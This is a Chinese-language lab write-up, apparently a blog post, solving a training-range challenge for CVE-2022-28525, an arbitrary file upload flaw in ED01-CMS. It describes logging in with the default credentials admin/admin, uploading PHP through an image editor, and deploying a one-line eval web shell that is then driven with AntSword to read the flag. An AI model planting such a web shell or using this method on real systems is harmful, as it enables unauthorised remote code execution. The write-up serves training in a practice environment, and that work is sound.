春秋云境CVE-2022-28525

简介

ED01-CMS v20180505 存在任意文件上传漏洞

这关考察的是文件上传,且没有任何的上传验证,只需要登录进后台就可以了。

正文

进入靶场,首先就看到右边有个登录界面,那么就直接开始注册一个,省的麻烦。

所以我就注册用的是admin。结果巧妙的是,这个靶场正好有admin的账号,于是就提示我存在admin账号,那么我都知道有了admin这个账号存在,那我还注册什么,直接尝试弱口令试试呗。结果不试不知道,一用admin试试,发现登录进去了。

弱口令尝试登录

运气挺好账号密码都是admin。

进入后台

这个靶场有点卡,登录跳转界面都要好久,不过没关系,进入后台就完成了一大半了。

来到后台界面,直接想从左边那么多里面进行查看,看看哪里存在文件上传。

发现测试点

巧的是,正好第二个界面就存在文章修改。

看到有这么多图片且还能进行修改,这不妥妥的测试点吗,所以我先随便点开一个图片,发现直接可以看到图片的绝对路径。这不妥妥的让我上传shell吗?

上传phpinfo

话不多说,直接点击修改按钮开始尝试上传phpinfo(),直接点击上传发现显示的是图片格式,所以我们需要手动去选择显示所有文件,这样我们就可以上传php文件了。

Phpinfo的代码是:<?php phpinfo();?>

开始上传,结果最顶上提示我已经修改了数据,但是尴尬的是为什么我看不到修改后的文件呢,是不是我哪里出错了,后来才发现我原来是上传的时候没有点击new image这个按钮,导致我上传的东西我看不见。

注意

注意一定要选择这关才能上传成功,不然我们上传后都找不到了。

直接右键新建窗口打开,成功上传了phpinfo();这不就简单了吗?

上传shell

可以选择上传一句话木马传入shell也可以上传命令执行两种方法。

这里我就选择最简单的,一句话木马。

我的一句话木马的代码是:<?php @eval($_POST["x"]);?>

还是老步骤,直接新窗口打开文件,把url全部复制到蚁剑去。

注意我上传的shell参数是x所以我连接的密码就是x,请按照自己上传的参数来进行修改。

找到flag

上传成功,话不多说直接进去找flag,发现当前路径没有,那么就直接进入根目录找。

找到flag文件打开就是我们心心念念的flag密码啦。

这关靶场就这么愉快的结束啦

总结

这关是一个比较简单的靶场,他涉及到的点不多,只有弱口令和文件上传,很适合刚学文件上传的我们来练手,同时也给我们提供了一个很好的测试思路点。

  • 16
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 1
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值